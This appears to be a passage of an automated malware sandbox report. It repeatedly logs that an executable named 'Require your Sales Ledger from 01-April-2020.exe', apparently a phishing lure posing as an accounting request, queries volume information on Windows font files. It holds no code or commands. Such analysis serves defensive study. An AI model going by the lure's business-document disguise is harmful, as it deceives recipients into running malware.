                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
